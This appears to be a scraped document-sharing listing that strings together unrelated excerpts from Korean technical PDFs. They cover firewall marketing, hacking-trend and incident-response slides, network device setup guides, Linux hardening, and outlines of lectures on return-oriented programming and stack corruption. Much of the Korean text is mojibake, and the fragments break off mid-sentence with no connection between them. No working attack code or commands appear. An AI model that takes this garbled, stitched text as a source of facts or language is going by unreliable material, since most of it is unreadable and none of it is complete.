More information๋คํธ์ํฌ ์์ ์ฑ์ ์ง์ผ์ค ์ต๊ณ ์ ๊ธฐ์ ๊ณผ ์ฑ๋ฅ TrusGuard๋ ๊ตญ๋ด ์ต์ด์ ํตํฉ๋ณด์์๋ฃจ์ ์ผ๋ก์ ์ง๋ 5๋ ๊ฐ ์ฝ 4์ฒ์ฌ ๊ณ ๊ฐ ์ฌ์ดํธ์ ๊ตฌ์ถ ์ด์๋๋ฉด์ ๊ธฐ์ ์ ์์ ์ฑ๊ณผ ์ฑ๋ฅ๋ฉด์์ ์ฒ ์ ํ ์์ฅ ๊ฒ์ฆ์ ๊ฑฐ์ณค์ต๋๋ค. ๋ํ TrusGuard๋ ๋จ๋ ๊ธฐ๋ฅ ๋๋ ๋ณตํฉ ๊ธฐ๋ฅ ๊ตฌ๋ ์
๋คํธ์ํฌ ๋ณด์๋ ์์ฒ ์์ฐ๊ตฌ์์ ๋๋ค ํตํฉ ๋ณด์์ No.1 ํํธ๋, AhnLab TrusGuard ๋คํธ์ํฌ ํ๊ฒฝ์ ์ํธํ๋ ์ต๊ณ ์ ํตํฉ ๋ณด์ ์์คํ ๊ณ ์ฑ๋ฅ ๋ฐฉํ๋ฒฝใVPN Security ๊ธฐ์ ๊ณผ ๊ณ ํ์ง Integrated Security ๊ธฐ์ ์ ๊ฐ๋ ฅํ ๊ฒฐํฉ ๋คํธ์ํฌ ์์ ์ฑ์ ์ง์ผ์ค ์ต๊ณ ์ ๊ธฐ์ ๊ณผ ์ฑ๋ฅ TrusGuard๋ ๊ตญ๋ด ์ต์ด์ ํตํฉ๋ณด์์๋ฃจ์ ์ผ๋ก์ ์ง๋ 5๋ ๊ฐ
More information์ต๊ทผ ํดํนํํฉ ๋ฐ ํดํน๊ธฐ์
ํดํน๋ฐ๋ฐ์ด๋ฌ์ค์๋ฐฉ 2002. 7. 26 ์ ํ์ฒ / ํ๊ตญ์ ๋ณด๋ณดํธ์งํฅ์ hcjung@certcc.or.kr Korea CERT Coordination Center Korea Information Security Agency ๋ชฉ์ฐจ ํดํน๋ฐ์ด๋ฌ์ค์์ดํด ํดํน๋ฐ์ด๋ฌ์คํํฉ๊ณผ์ฌ๋ก ํ๊ฒฝ๋ณํ์ํดํน๋ฐ์ด๋ฌ์ค๋ํฅ ๊ณ์ธต์ ์ธ๋ฐฉ์ด ์ฌ๊ณ ์๋ฐฉ ์ ๊ทผํต์ ๊ณ์ / ํจ์ค์๋๋ณด์ ์ต์ํ์์๋น์ค์ ๊ณต
More informationhd1300_k_v1r2_Final_.PDF
Starter's Kit for HelloDevice 1300 Version 11 1 2 1 2 3 31 32 33 34 35 36 4 41 42 43 5 51 52 6 61 62 Appendix A (cross-over) IP 3 Starter's Kit for HelloDevice 1300 1 HelloDevice 1300 Starter's Kit HelloDevice
More informationPWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (
PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (http://ddns.hanwha-security.com) Step 1~5. Step, PC, DVR Step 1. Cable Step
More informationORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O
Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration
More informationuntitled
CAN BUS RS232 Line Ethernet CAN H/W FIFO RS232 FIFO IP ARP CAN S/W FIFO TERMINAL Emulator COMMAND Interpreter ICMP TCP UDP PROTOCOL Converter TELNET DHCP C2E SW1 CAN RS232 RJ45 Power
More information๋ฆฌ๋ ์ค๋ณด์๊ด๋ฆฌ.PDF
CMOS Boot loader xlock, vlock Boot loader boot: linux single root /etc/lilo.conf restricted password=pickyourpassword /etc/lilo.conf /sbin/lilo Login timeout ~/.bashrc ~/.bash_profile TMOUT=nn Logout ~/.bash_logout
More informationInterstage5 SOAP์๋น์ค ์ค์ ๊ฐ์ด๋
Interstage 5 Application Server ( Solaris ) SOAP Service Internet Sample Test SOAP Server Application SOAP Client Application CORBA/SOAP Server Gateway CORBA/SOAP Gateway Client INTERSTAGE SOAP Service
More informationOrcad Capture 9.x
OrCAD Capture Workbook (Ver 10.xx) 0 Capture 1 2 3 Capture for window 4.opj ( OrCAD Project file) Design file Programe link file..dsn (OrCAD Design file) Design file..olb (OrCAD Library file) file..upd
More informationSena Technologies, Inc. HelloDevice Super 1.1.0
HelloDevice Super 110 Copyright 1998-2005, All rights reserved HelloDevice 210 ()137-130 Tel: (02) 573-5422 Fax: (02) 573-7710 E-Mail: support@senacom Website: http://wwwsenacom Revision history Revision
More information01รรฅ
CHAPTER 01 1 Fedora Fedora Linux Toolbox 2003 Fedora Core( ) http://fedoraproject.org www.redhat.com 2 CHAPTER Fedora RHEL GNU public license www.centos.org www.yellowdoglinux.com www. lineox.net www.
More informationCD-RW_Advanced.PDF
HP CD-Writer Program User Guide - - Ver. 2.0 HP CD-RW Adaptec Easy CD Creator Copier, Direct CD. HP CD-RW,. Easy CD Creator 3.5C, Direct CD 3.0., HP. HP CD-RW TEAM ( 02-3270-0803 ) < > 1. CD...3 CD...5
More informationSun Java System Messaging Server 63 64
Sun Java System Messaging Server 6.3 64 Sun Java TM System Communications Suite Sun Microsystems, Inc. 4150 Network Circle Santa Clara, CA 95054 U.S.A. : 820 2868 2007 7 Copyright 2007 Sun Microsystems,
More informationChap7.PDF
Chapter 7 The SUN Intranet Data Warehouse: Architecture and Tools All rights reserved 1 Intranet Data Warehouse : Distributed Networking Computing Peer-to-peer Peer-to-peer:,. C/S Microsoft ActiveX DCOM(Distributed
More informationSolaris Express Developer Edition
Solaris Express Developer Edition : 2008 1 Solaris TM Express Developer Edition Solaris OS. Sun / Solaris, Java, Web 2.0,,. Developer Solaris Express Developer Edition System Requirements. 768MB. SPARC
More information๋ชฉ์ฐจ BUG offline replicator ์์์ ํจํ์ง์์๋ก๊ทธ๋ฅผ์ฝ์๊ฒฝ์ฐ๋น์ ์์ข ๋ฃํ ์์๋ค... 3 BUG ๊ฐ partition ์ด์๋ก๋ค๋ฅธ tablespace ๋ฅผ๊ฐ์ง๊ณ , column type ์ด CLOB ์ด๋ฉฐ, ํด๋น table ์ truncate
ALTIBASE HDB 6.1.1.5.6 Patch Notes ๋ชฉ์ฐจ BUG-39240 offline replicator ์์์ ํจํ์ง์์๋ก๊ทธ๋ฅผ์ฝ์๊ฒฝ์ฐ๋น์ ์์ข ๋ฃํ ์์๋ค... 3 BUG-41443 ๊ฐ partition ์ด์๋ก๋ค๋ฅธ tablespace ๋ฅผ๊ฐ์ง๊ณ , column type ์ด CLOB ์ด๋ฉฐ, ํด๋น table ์ truncate ํ๋ค, hash partition
More informationMySQL-Ch10
10 Chapter.,,.,, MySQL. MySQL mysqld MySQL.,. MySQL. MySQL....,.,..,,.,. UNIX, MySQL. mysqladm mysqlgrp. MySQL 608 MySQL(2/e) Chapter 10 MySQL. 10.1 (,, ). UNIX MySQL, /usr/local/mysql/var, /usr/local/mysql/data,
More informationhlogin7
0x07. Return Oriented Programming ROP? , (DEP, ASLR). ROP (Return Oriented Programming) (excutable memory) rop. plt, got got overwrite RTL RTL Chain DEP, ASLR gadget Basic knowledge plt, got call function
More informationMicrosoft PowerPoint - G3-2-๋ฐ์ฌ์ฐ.pptx
International Trends of Hacking Technology (์ต์ ๊ตญ์ ํดํน ๊ธฐ์ ๋ํฅ) ETRI ๋ถ์ค ์ฐ๊ตฌ์ Contents 1. Introduction 2. Major Cyber Attacks and Threats in 2013 3. Trends Of Hacking Technology 4. Future 1. Introduction MegaTrend
More information6๊ฐ.hwp
----------------6๊ฐ ์ ๋ณดํต์ ๊ณผ ์ธํฐ๋ท(1)------------- **์ฃผ์ ํค์๋ ** (1) ์ธํฐ๋ท ์๋น์ค (2) ๋๋ฉ์ธ๋ค์, IP ์ฃผ์ (3) ์ธํฐ๋ท ์ต์คํ๋ก๋ฌ (4) ์ ๋ณด๊ฒ์ (5) ์ธํฐ๋ท ์ฉ์ด (1) ์ธํฐ๋ท ์๋น์ค******************************* [08/4][08/2] 1. ๋ค์ ์ค ์ธํฐ๋ท ์๋น์ค์ ๋ํ ์ค๋ช ์ผ๋ก
More informationSena Device Server Serial/IP TM Version
Sena Device Server Serial/IP TM Version 1.0.0 2005. 3. 7. Release Note Revision Date Name Description V1.0.0 2005-03-7 HJ Jeon Serial/IP 4.3.2 ( ) 210 137-130, : (02) 573-5422 : (02) 573-7710 email: support@sena.com
More informationรยงรรยปรงยฐรญยนรฆรรถยฑรขยผรบยฐยณยนร
2002. 10. 1 ์ ํ์ฒ hcjung@certcc.or.kr ํ๊ตญ์ ๋ณด๋ณดํธ์งํฅ์ํดํน๋ฐ์ด๋ฌ์ค์๋ด์ง์์ผํฐ ๋ชฉ์ฐจ ์ฌ๊ณ ๋์๋จ๊ณ๋ณ์ฒ๋ฆฌ์ ์ฐจ ๋ก๊ทธ๋ถ์ ์์คํ ํ์ผ๋ถ์ ์นจ์ ํ์ ์ถ์ & ๋ฐฑ๋์ดํ์ง ์นจํด์ฌ๊ณ ๋์๋ฐฉ๋ฒ PGP ์ฌ๊ณ ๋์๋จ๊ณ๋ณ์ฒ๋ฆฌ์ ์ฐจ Emergency Action Plan Phase 1 : Preparation Phase 2 : Identification Phase
More informationํดํน ๋์ ๊ฒฝ์ง๋ํ
์์ ์ด์์ฝ (KT ๋ง๊ด๋ฆฌ / ์ง์๋จ๋ณด์๊ธฐ์ ๋ถ ) ์ ์ฃผํ (KT ๋ง๊ด๋ฆฌ / ์ง์๋จ๋ณด์๊ธฐ์ ๋ถ ) ๊น์์ (KT ๋ง๊ด๋ฆฌ / ์ง์๋จ๋ณด์๊ธฐ์ ๋ถ ) ์ต์ฉํ (KT ๋ง๊ด๋ฆฌ / ์ง์๋จ๋ณด์๊ธฐ์ ๋ถ ) ์์ฝ๋ณด๊ณ ์ ์นจํด์ฌ๊ณ ๋ถ์ * Unix ์นจํด์ฌ๊ณ ๋ถ์์๋ก๊ทธํ์ผ๋ถ์๊ณผํ์ผ๋ณ์กฐ๋ถ์์ผ๋ก๋ถํฐ๋จ์๋ฅผ์ฐพ์๋๊ฐ๋๊ฒ์ด์ผ๋ฐ์ ์ด๊ธฐ๋๋ฌธ์์ผ์ฐจ์ ์ผ๋ก๋ก๊ทธํ์ผ๋ถ์์์๋ํ์์ผ๋, ์๊ฒฉ๊ณต๊ฒฉ๋ก๊ทธ๋ฑ์ํน๋ณํ๋ฐ๊ฒฌ๋์ง์์์ผ๋ฉฐ์ผ๋ถ๋ฐฑ๋์ด๋์์ํ๋ฉ์ผ๋ก๊ทธ๋ง์๋ฐ๊ฒฌํจ.
More informationOPCTalk for Hitachi Ethernet 1 2. Path. DCOMwindow NT/2000 network server. Winsock update win95. . . 3 Excel CSV. Update Background Thread Client Command Queue Size Client Dynamic Scan Block Block
More information๊ฐ์10
Computer Programming gdb and awk 12 th Lecture ๊นํ์ฒ ์ปดํจํฐ๊ณตํ๋ถ์์ธ๋ํ๊ต ์์ C Compiler and Linker ๋ณด์ถฉ Static vs Shared Libraries ( ๊ณ์ ) gdb awk Q&A Shared vs Static Libraries ( ๊ณ์ ) Advantage of Using Libraries Reduced
More informationDeok9_Exploit Technique
Exploit Technique CodeEngn Co-Administrator!!! and Team Sur3x5F Member Nick : Deok9 E-mail : DDeok9@gmail.com HomePage : http://deok9.sur3x5f.org Twitter :@DDeok9 > 1. Shell Code 2. Security
More informationhlogin2
0x02. Stack Corruption off-limit Kernel Stack libc Heap BSS Data Code off-limit Kernel Kernel : OS Stack libc Heap BSS Data Code Stack : libc : Heap : BSS, Data : bss Code : off-limit Kernel Kernel : OS
More information10X56_NWG_KOR.indd
๋์งํธ ํ๋ก์ ํฐ X56 ๋คํธ์ํฌ ๊ฐ์ด๋ ์ด ์ ํ์ ๊ตฌ์ ํด ์ฃผ์ ์ ๊ฐ์ฌํฉ๋๋ค. ๋ณธ ์ค๋ช ์๋ ๋คํธ์ํฌ ๊ธฐ๋ฅ ๋ง์ ์ค๋ช ํ๊ธฐ ์ํ ๊ฒ์ ๋๋ค. ๋ณธ ์ ํ์ ์ฌ๋ฐ๋ฅด๊ฒ ์ฌ ์ฉํ๋ ค๋ฉด ์ด ์ทจ๊ธ์ ๋ช ์ ์ ๋ณธ ์ ํ์ ๋ค๋ฅธ ์ทจ๊ธ์ ๋ช ์ ๋ฅผ ์ฐธ์กฐํ์๊ธฐ ๋ฐ๋๋๋ค. ์ค์ํ ์ฃผ์์ฌํญ ์ด ์ ํ์ ์ฌ์ฉํ๊ธฐ ์ ์ ๋จผ์ ์ด ์ ํ์ ๋ํ ๋ชจ๋ ์ค๋ช ์๋ฅผ ์ ์ฝ์ด ๋ณด์ญ์์ค. ์ฝ์ ๋ค์๋ ๋์ค์ ํ์ํ ๋
More informationvm-์จ์ด-01์ฅ
Chapter 16 21 (Agenda). (Green),., 2010. IT IT. IT 2007 3.1% 2030 11.1%, IT 2007 1.1.% 2030 4.7%, 2020 4 IT. 1 IT, IT. (Virtualization),. 2009 /IT 2010 10 2. 6 2008. 1970 MIT IBM (Mainframe), x86 1. (http
More informationยฐรญยผยฎรร รรขยทร
Performance Optimization of SCTP in Wireless Internet Environments The existing works on Stream Control Transmission Protocol (SCTP) was focused on the fixed network environment. However, the number of
More informationRemote UI Guide
Remote UI KOR Remote UI Remote UI PDF Adobe Reader/Adobe Acrobat Reader. Adobe Reader/Adobe Acrobat Reader Adobe Systems Incorporated.. Canon. Remote UI GIF Adobe Systems Incorporated Photoshop. ..........................................................
More informationCisco SDN 3.0 DDoS DDoS Cisco DDoS Real Demo 2008 Cisco Systems, Inc. All rights reserved. 2
SDN DDoS (whchoi@cisco.com) Cisco Systems Korea 2008 Cisco Systems, Inc. All rights reserved. 1 Cisco SDN 3.0 DDoS DDoS Cisco DDoS Real Demo 2008 Cisco Systems, Inc. All rights reserved. 2 Cisco SDN 3.0
More information21 8 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 33 36 37 2 218 Bot 1,45 1,69 12.7% 1,644 1,3 26.5% 666 556 19.8% 25 66 24.2% 423 44 4.7% 323
More informationCopyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper
Windows Netra Blade X3-2B( Sun Netra X6270 M3 Blade) : E37790 01 2012 9 Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs,
More informationTTA Verified : HomeGateway :, : (NEtwork Testing Team)
TTA Verified : HomeGateway :, : (NEtwork Testing Team) : TTA-V-N-05-006-CC11 TTA Verified :2006 6 27 : 01 : 2005 7 18 : 2/15 00 01 2005 7 18 2006 6 27 6 7 9 Ethernet (VLAN, QoS, FTP ) (, ) : TTA-V-N-05-006-CC11
More informationAnalyst Briefing
. Improve your Outlook on Email and File Management iseminar.. 1544(or 6677)-3355 800x600. iseminar Chat... Improve your Outlook on Email and File Management :, 2003 1 29.. Collaboration Suite - Key Messages
More informationuntitled
PowerBuilder ๏ฆ Microsoft SQL Server database PB10.0 PB9.0 ๏ฅด Microsoft SQL Server ๏ฆพ database Profile MSS ๏ฆพ (Microsoft SQL Server database interface) ๏จ๏ฆบ PB10.0 ๏ฆบ Sybase ๏ฅง Microsoft ๏ฆพ ๏ฆบ SQL Server ๏ฆพ PB10.0
More informationfinal_thesis
CORBA/SNMP DPNM Lab. POSTECH email : ymkang@postech.ac.kr Motivation CORBA/SNMP CORBA/SNMP 2 Motivation CMIP, SNMP and CORBA high cost, low efficiency, complexity 3 Goal (Information Model) (Operation)
More informationthesis
CORBA TMN Surveillance System DPNM Lab, GSIT, POSTECH Email: mnd@postech.ac.kr Contents Motivation & Goal Related Work CORBA TMN Surveillance System Implementation Conclusion & Future Work 2 Motivation
More information์๋ฐ-11์ฅN'1-502
C h a p t e r 11 java.net.,,., (TCP/IP) (UDP/IP).,. 1 ISO OSI 7 1977 (ISO, International Standards Organization) (OSI, Open Systems Interconnection). 6 1983 X.200. OSI 7 [ 11-1] 7. 1 (Physical Layer),
More information์ฌ๋ผ์ด๋ 1
/ ์ ๋์ค์์คํ ๊ฐ์ / ํ์ผ / ํ๋ก์ธ์ค 01 File Descriptor file file descriptor file type unix ์์์ํ์ผ์๋จ์ง๋ฐ์ดํธ๋ค์๋์ด์ operating system ์ํ์ผ์์ด๋คํฌ๋งท๋๋ถ๊ณผํ์ง์์ ํ์ผ์๋ด์ฉ์๋ฐ์ดํธ๋จ์๋ก์ฃผ์๋ฅผ์ค์์์ file descriptor ๋ 0 ์ด๋์์์ file ์ open ์ด๋ creat ๋ก file
More information<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>
๊ฐ ์ ํํ์ด์ง ํดํน ํํฉ ๋ฐ ์ฌ๋ก ํํ์ด์ง ๊ฐ๋ฐ์ ๋ณด์ ์ทจ์ฝ์ ๋ฐ ๋์ฑ ์ฃผ์ ์ ํ๋ฆฌ์ผ์ด์ ๋ณด์ ๋์ฑ ๊ฒฐ ๋ก ์ฐธ๊ณ ์๋ฃ [๋ถ๋ก1] ๊ฐ๋ฐ ์ธ์ด๋ณ ๋ก๊ทธ์ธ ์ธ์ฆ ํ๋ก์ธ์ค ์์ [๋ถ๋ก2] ๋๊ท๋ชจ ํํ์ด์ง ๋ณ์กฐ ์๋ฐฉ์ ์ํ ๊ถ๊ณ (์) [๋ถ๋ก3] ๊ฐ์ธ์ ๋ณด์ ๊ธฐ์ ์ ๊ด๋ฆฌ์ ๋ณดํธ์กฐ์น ๊ธฐ์ค(์) [๋ถ๋ก4] ์น ๋ณด์๊ด๋ จ ์ฃผ์ ์ฌ์ดํธ ๋ฆฌ์คํธ 7000 6,478 6000 5000
More informationchapter4
Basic Netw rk 1. เธ เธ เธ 2. 3. เธ เธ 4. เธ 2 1. 2. 3. 4. เธ 5. เธ 6. เธ เธ 7. เธ 3 เธ เธ เธ เธ (Mainframe) เธ เธ เธ เธ (Terminal) เธ เธ เธ เธ เธ เธ เธ เธ 4 เธ (Dumb Terminal) เธ เธ เธ เธ Mainframe เธ CPU เธ เธ เธ เธ 5 เธ เธ เธ เธ เธ เธ เธ เธ เธ เธ
More informationCopyright 2004 Sun Microsystems, Inc Network Circle, Santa Clara, CA U.S.A..,,. Sun. Sun. Berkeley BSD. UNIX X/Open Company, Ltd.. Sun, Su
Java Desktop System 2 Sun Microsystems, Inc. 4150 Network Circle Santa Clara, CA 95054 U.S.A. : 817 7757 10 2004 9 Copyright 2004 Sun Microsystems, Inc. 4150 Network Circle, Santa Clara, CA 95054 U.S.A..,,.
More information1. What is AX1 AX1 Program์ WIZnet ์ฌ์ Hardwired TCP/IP Chip์ธ iinchip ๋ค์์ฑ๋ฅํ๊ฐ๋ฐ Test๋ฅผ์ํด์ ์๋ Windows ๊ธฐ๋ฐ์ PC Program์ด๋ค. AX1์ Internet์ํตํด iinchip Evaluation
1. What is AX1 AX1 Program์ WIZnet ์ฌ์ Hardwired TCP/IP Chip์ธ iinchip ๋ค์์ฑ๋ฅํ๊ฐ๋ฐ Test๋ฅผ์ํด์ ์๋ Windows ๊ธฐ๋ฐ์ PC Program์ด๋ค. AX1์ Internet์ํตํด iinchip Evaluation Board(EVB B/D) ๋ค๊ณผ TCP/IP Protocol๋ก์ฐ๊ฒฐ๋๋ฉฐ, ์ฐ๊ฒฐ๋ TCP/IP
More informationCPX-E-SYS_BES_C_ _ k1
CPX-E 8727 27-7 [875294] CPX-E-SYS-KO CODESYS, PI PROFIBUS PROFINET (). :, 2 Festo CPX-E-SYS-KO 27-7 ... 5.... 5.2... 5.3... 5.4... 5.5... 5 2... 6 2.... 6 2..... 6 2..2 CPX-E... 7 2..3 CPX-E... 9 2..4...
More information<4D6963726F736F667420576F7264202D20B3BBBACEC7D8C5B7B4EBC8B820BAB8B0EDBCAD2E646F6378>
HUST ๋ด๋ถํดํน๋ํ ๋ณด๊ณ ์ Uprising ํ์: ์ด๊ทํ, ๊น์ ์ฃผ, ์ฅ๋ฏผ์, ์ก์ง๊ธฐ Network.1 ๋ฌธ์ ํ์ผ์ UltraEdit์ผ๋ก ์ด์ด๋ณด๋ ip๊ฐ ์ ํ์๊ณ ํต์ ๋ด์ฉ์ธ ๊ฒ ๊ฐ์ ๋ด์ฉ๋ค์ด ํฌํจ๋์ด์์ด Wireshark๋ก ์ด์ด๋ณด๋ ํจํท๋ค์ด ์บก์ณ๋์ด์์๋ค. Wireshark์์ Follow TCP Stream์ ์ด์ฉํด ํต์ ๋ด์ฉ์ ๋ณด๋๋ฐ ์ผ๋ถ๊ฐ ์ธ์ฝ๋๋ Base64
More informationDW ๊ฐ์.PDF
Data Warehouse Hammersoftkorea BI Group / DW / 1960 1970 1980 1990 2000 Automating Informating Source : Kelly, The Data Warehousing : The Route to Mass Customization, 1996. -,, Data .,.., /. ...,.,,,.
More informationARMBOOT 1
100% 2003222 : : : () PGPnet 1 (Sniffer) 1, 2,,, (Sniffer), (Sniffer),, (Expert) 3, (Dashboard), (Host Table), (Matrix), (ART, Application Response Time), (History), (Protocol Distribution), 1 (Select
More information<%DOC NAME%> (User Manual)
AVG Email Server Edition 2012 2012.06 (2/ 28/ 2012) Copy right AV G Tec hnologies CZ, s.r.o. All rights res erv ed.. RSA Data Sec urity, Inc. MD5 Mes s age-diges t Algorithm, Copy right (C) 1991-2, RSA
More informationNetwork Security - Wired Sniffing ์ค์ต ICNS Lab. Kyung Hee University
Network Security - Wired Sniffing ์ค์ต ICNS Lab. Kyung Hee University Outline Network Network ๊ตฌ์กฐ Source-to-Destination ๊ฐ packet ์ ๋ฌ๊ณผ์ Packet Capturing Packet Capture ์์๋ฆฌ Data Link Layer ์๋์ Wired LAN Environment
More information(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 -
(Asynchronous Mode) - - - ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 - UART (Univ ers al As y nchronous Receiver / T rans mitter) 8250A 8250A { COM1(3F8H). - Line Control Register
More information์ฌ๋ผ์ด๋ 1
PKI Kerberos SAML & Shibboleth OpenID Cardspace & ID 2 < > (= ) password, OTP, bio, smartcard, pki CardSpace, ID What you have.., 2 factor, strong authentication 4 (SSO) Kerberos, OpenID 5 Shared authentication
More informationPRO1_04E [์ฝ๊ธฐ ์ ์ฉ]
Siemens AG 1999 All rights reserved File: PRO1_04E1 Information and S7-300 2 S7-400 3 EPROM / 4 5 6 HW Config 7 8 9 CPU 10 CPU : 11 CPU : 12 CPU : 13 CPU : / 14 CPU : 15 CPU : / 16 HW 17 HW PG 18 SIMATIC
More informationChapter11OSPF
OSPF 111 OSPF Link state Interior Gateway Protocol OSPF 1988 IETF OSPF workgroup OSPF RFC 2383 version 2 Chapter OSPF Version 2 OSPFIGP AS 1 1111 Convergence Traffic Distance Vector Link state OSPF (Flooding),
More informationvm-์จ์ด-์๋ถ์
VMware vsphere 4 This document was created using the official VMware icon and diagram library. Copyright 2009 VMware, Inc. All rights reserved. This product is protected by U.S. and international copyright
More informationOZ-LMS TM OZ-LMS 2008 OZ-LMS 2006 OZ-LMS Lite Best IT Serviece Provider OZNET KOREA Management Philosophy & Vision Introduction OZNETKOREA IT Mission Core Values KH IT ERP Web Solution IT SW 2000 4 3 508-2
More information์ด๋ณด์๋ฅผ ์ํ ASP.NET 2.0
(World Wide Web), HTML., (ebay) (Amazon.com) HTML,., Microsoft ASP.NET. ASP.NET ASP.NET., ASP.NET HTML,,. ASP.NET HTML.. ASP.NET, Microsoft Visual Basic. Visual Basic. 5 Visual Basic, Visual Basic. ASP.NET
More informationํ์ง๊ฒ์ฆ๋ถ์ผ Stack ํตํฉ Test ๊ฒฐ๊ณผ๋ณด๊ณ ์ [ The Bug Genie ]
ํ์ง๊ฒ์ฆ๋ถ์ผ Stack ํตํฉ Test ๊ฒฐ๊ณผ๋ณด๊ณ ์ [ The Bug Genie ] 2014. 10. ๋ชฉ ์ฐจ I. Stack ํตํฉํ ์คํธ๊ฐ์ 1 1. ๋ชฉ์ 1 II. ํ ์คํธ๋์์๊ฐ 2 1. The Bug Genie ์๊ฐ 2 2. The Bug Genie ์ฃผ์๊ธฐ๋ฅ 3 3. The Bug Genie ์์คํ ์๊ตฌ์ฌํญ๋ฐ์ฃผ์์ฌํญ 5 III. Stack ํตํฉํ ์คํธ 7 1. ํ ์คํธํ๊ฒฝ
More informationVoice Portal using Oracle 9i AS Wireless
Voice Portal Platform using Oracle9iAS Wireless 20020829 Oracle Technology Day 1 Contents Introduction Voice Portal Voice Web Voice XML Voice Portal Platform using Oracle9iAS Wireless Voice Portal Video
More information1?4?์ฅ?-32
* (ICT),,,,,.., * . ) ( ),, (, ).,,,,., (cyber security).,,. ), ),,,,,,.,,.,.,,...,,, ) (William Gibson) (Neuromancer). ) ; ;.,.. ),,,.,,,,. ..,..,.,...,..,.,..,,,..,.,,,.. . ). (ubiquitous),,. (,, ).
More informationESP1ยบร-04
Chapter 04 4.1..,..,.,.,.,. RTOS(Real-Time Operating System)., RTOS.. VxWorks(www.windriver.com), psos(www.windriver.com), VRTX(www.mento. com), QNX(www.qnx.com), OSE(www.ose.com), Nucleus(www.atinudclus.
More informationSecurity Overview
May. 14, 2004 Background Security Issue & Management Scope of Security Security Incident Security Organization Security Level Security Investment Security Roadmap Security Process Security Architecture
More informationecorp-ํ๋ก์ ํธ์ ์์์์ฑ์ค๋ฌด(์์3)
(BSC: Balanced ScoreCard) ( ) (Value Chain) (Firm Infrastructure) (Support Activities) (Human Resource Management) (Technology Development) (Primary Activities) (Procurement) (Inbound (Outbound (Marketing
More informationMicrosoft PowerPoint - chap9 [ํธํ ๋ชจ๋]
์ 9 ์ฅํ๋ก์ธ์ค๊ด๊ณ ์๋์ฐฝ๋ณ๋ชจ 1 Contents 1. Logins 2. Process Groups 3. Sessions 4. Controlling Terminal 5. Job Control ์๋์ฐฝ๋ณ๋ชจ 2 ๋ก๊ทธ์ธ ์๋์ฐฝ๋ณ๋ชจ 3 ํฐ๋ฏธ๋๋ก๊ทธ์ธ /etc/ttys: 1 line per terminal device getty: opens terminal device
More information์๊ฐ 2016. 03 CONTENTS 3 EXPERT COLUMN ์ํ ์ ํผ ์ ํธ๋ก์ด๋ชฉ๋ง 4 SPECIAL REPORT ํจ์น ๊ด๋ฆฌ์ ํ๊ณ์ AhnLab Patch Management ํต์ฌ์ ํจ์น ๊ด๋ฆฌ, ์? 8 HOT ISSUE 2016๋ ์ ์ฑ๊ฒจ๋ด์ผ ํ ๊ฐ์ธ์ ๋ณด๋ณดํธ
์๋ฉ ์จ๋ผ์ธ ๋ณด์ ๋งค๊ฑฐ์ง 2016. 03 Patch Management System ์๊ฐ 2016. 03 CONTENTS 3 EXPERT COLUMN ์ํ ์ ํผ ์ ํธ๋ก์ด๋ชฉ๋ง 4 SPECIAL REPORT ํจ์น ๊ด๋ฆฌ์ ํ๊ณ์ AhnLab Patch Management ํต์ฌ์ ํจ์น ๊ด๋ฆฌ, ์? 8 HOT ISSUE 2016๋ ์ ์ฑ๊ฒจ๋ด์ผ ํ ๊ฐ์ธ์ ๋ณด๋ณดํธ ๋ฒ๋ น ์ฌํญ
More informationPowerPoint ํ๋ ์ ํ ์ด์
SECUINSIDE 2017 Bypassing Web Browser Security Policies DongHyun Kim (hackpupu) Security Researcher at i2sec Korea University Graduate School Agenda - Me? - Abstract - What is HTTP Secure Header? - What
More informationF1-1(์์ ).ppt
, thcho@kisaorkr IPAK (Information Protection Assessment Kit) IAM (INFOSEC Assessment Methodology) 4 VAF (Vulnerability Assessment Framework) 5 OCTAVE (Operationally Critical Threat, Asset, and Vulnerability
More information..............
์ธํฐ๋ท์ ์ด์ฉํ ์๊ฒฉ์ง ํ ๋ ๋น์ ์์ฒญ์๋น์ค๋ฅผ ๋๋ฌ์ผ ๋ ์ฌ๊ฑด ์ธํฐ๋ท์ ์ด์ฉํ ์๊ฒฉ์ง ํ ๋ ๋น์ ์์ฒญ์๋น์ค๋ฅผ ๋๋ฌ์ผ ๋ ์ฌ๊ฑด ๅผ ็ ๅฃซ ๅคง ๆป ๅ (Hitoshi Otaki) 1) ํ์๋ํ๊ต ๋ฒ๊ณผ๋ํ ๆ ๆ ๅฐน ๅฎฃ ็ 2) ๋ชฉ ์ฐจ (์๋์) 1. ๋ ์ฌ๊ฑด์ ๊ฐ์ 2. ๋น์ฌ์๊ฐ ์๊ตฌํ ํผ๋ณด์ ๊ถ๋ฆฌ 3. ์ ์์ธ์ ๊ถ์ ๋ํ์ฌ 4. ์ฑ๋ฌด์์ ์ฅ์น 5. ์ฑ๋ฌด์์ ํ์ 6.
More informationKISA-GD
